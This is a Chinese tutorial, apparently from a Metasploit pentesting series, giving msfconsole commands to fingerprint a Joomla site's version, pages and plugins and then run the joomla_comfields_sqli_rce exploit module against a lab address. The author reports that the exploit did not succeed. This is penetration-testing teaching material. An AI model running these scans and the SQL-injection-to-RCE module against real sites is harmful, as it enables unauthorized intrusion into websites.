一、使用Metasploit对Joomal进行侦察

1、探测版本信息

选择joomla_version辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/http/joomla_versionset rhosts 192.168.1.111set rport 8080run

2、页面枚举

选择Joomla_pages辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/http/joomla_pagesset rhosts 192.168.1.111set rport 8080run

3、插件枚举

选择Joomla_plugins辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/http/joomla_pluginsset rhosts 192.168.1.111set rport 8080run

二、使用Metasploit对Joomla进行漏洞利用

1、use unix/webapp/joomla_comfields_sqli_rce2、set rhosts 192.168.1.1113、set rport 80804、run

5、因为利用模块会报错,所以需要修改一下,但是最后还是没有利用成功,获取cookie的时候可能出问题了,大家有兴趣的可以继续修改一下。

该系列教程内容参考自华章IT出版的

《Web渗透测试实战:基于Metasploit 5.0》

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

Metasploit6.0系列教程 -- 渗透Joomla网站相关推荐

  1. 王姨劝我学HarmonyOS鸿蒙2.0系列教程之六自定义View涂鸦项目实战!

    这一节写个简单的项目,涂鸦,简单来讲就是画什么,显示什么.最好的网站,就是官网,这里再发一下: https://developer.harmonyos.com/cn/docs/documentatio ...

  2. python3.6 django教程_【Python3.6+Django2.0+Xadmin2.0系列教程一】环境搭建及项目创建

    由于工作需要,接触了大半年时间的Django+xadmin框架,一直没空对这块对进行相关的梳理.最近在同事的怂恿下,就在这分享下笔者的学习及工作经验吧. 好了,话不多说,下面开始进入正题: 环境需求: ...

  3. 黄聪:Microsoft Enterprise Library 5.0 系列教程(二) Cryptography Application Block (高级)

    原文:黄聪:Microsoft Enterprise Library 5.0 系列教程(二) Cryptography Application Block (高级) 本章介绍的是企业库加密应用程序模块 ...

  4. 王姨劝我学HarmonyOS鸿蒙2.0系列教程之二应用知识梳理逻辑!

    原创PDF |<Android 深入系统完全讲解>免费开源,可能价值百万! 王姨劝我学HarmonyOS鸿蒙2.0系列教程之一环境搭建&&跑起来模拟器! 写完了第一篇,跑去 ...

  5. 王姨劝我学HarmonyOS鸿蒙2.0系列教程之三Ability概述调用方法!

    原创PDF |<Android 深入系统完全讲解>免费开源,可能价值百万! 王姨劝我学HarmonyOS鸿蒙2.0系列教程之一环境搭建&&跑起来模拟器! 王姨劝我学Harm ...

  6. 王姨劝我学HarmonyOS鸿蒙2.0系列教程之四Git搭建下载实例!

    原创PDF |<Android 深入系统完全讲解>免费开源,可能价值百万! 王姨劝我学HarmonyOS鸿蒙2.0系列教程之三Ability概述&&调用方法! 相信大家看了 ...

  7. 王姨劝我学HarmonyOS鸿蒙2.0系列教程之五布局方法点击响应!

    原创PDF |<Android 深入系统完全讲解>免费开源,可能价值百万! 王姨劝我学HarmonyOS鸿蒙2.0系列教程之三Ability概述&&调用方法! 为了更好的交 ...

  8. 黄聪:Microsoft Enterprise Library 5.0 系列教程(七) Exception Handling Application Block

    黄聪:Microsoft Enterprise Library 5.0 系列教程(七) Exception Handling Application Block 原文:黄聪:Microsoft Ent ...

  9. 【Python3.6+Django2.0+Xadmin2.0系列教程之一(入门篇-上)】环境搭建及项目创建

    由于工作需要,接触了大半年时间的Django+xadmin框架,一直没空对这块对进行相关的梳理.最近在同事的怂恿下,就在这分享下笔者的学习及工作经验吧. 好了,话不多说,下面开始进入正题: 转载请注明 ...

最新文章

  1. cacti监控批量加,省时省力又省心。
  2. Spring Cloud Gateway 原生的接口限流该怎么玩
  3. 【视频教程】JEECG 入门视频教程大全+历史版本号代码下载
  4. CF1142C U2
  5. FAX modem和传真协议简介
  6. ITK:获取图像中标记区域的几何属性
  7. pyinstaller安装失败解决
  8. 用于Elasticsearch数据可视化和分析的强大工具
  9. python计算传入数字参数的和_Python基础_6
  10. [转]ViewPagerindicator 源码解析
  11. Socket开发探秘--基于Json格式的数据协议收发
  12. Jensen不等式概率论形式的证明
  13. linux查看cpu架构命令,linux查看cpu型号命令
  14. Python练习实例---房贷计算机
  15. 新侨移民告诉你:为什么要移民新西兰?
  16. JBoss,Geronimo还是Tomcat?——三种开源Java应用服务器的比较
  17. b站取消视频自动播放、自动续播(电脑端)
  18. 在私有组中将项目可见性从私有更改为内部导致500错误
  19. 解决LaTeX中的\pdfendlink ended up in different nesting level than \pdfstartlink.问题
  20. 移位 display属性 内补白 外补白 Layout布局

热门文章

  1. 微信小程序中使用emoji表情相关说明
  2. 深度学习部署(十八): CUDA RunTime API _wa_仿射变换的实现
  3. Python学多久能接单赚钱?按照这套路线学习,30天内就可以!
  4. 什么是软链接、硬链接
  5. NLP模型笔记2022-03:简单理解nlp句法分析
  6. 灿烂夏日里的翩翩蝴蝶结
  7. python math库 sqrt eval_假设 math 标准库已导入,那么表达式 eval('math.sqrt(4)') 的值为 _________ 。( ) (2.0分)_学小易找答案...
  8. java实现两个数运算_用java做简单的计算器类,实现两个数字的加减乘除运算
  9. 古人的名与字、号、讳、谥有什么区别
  10. 新能源汽车车架号VIN码查询车辆信息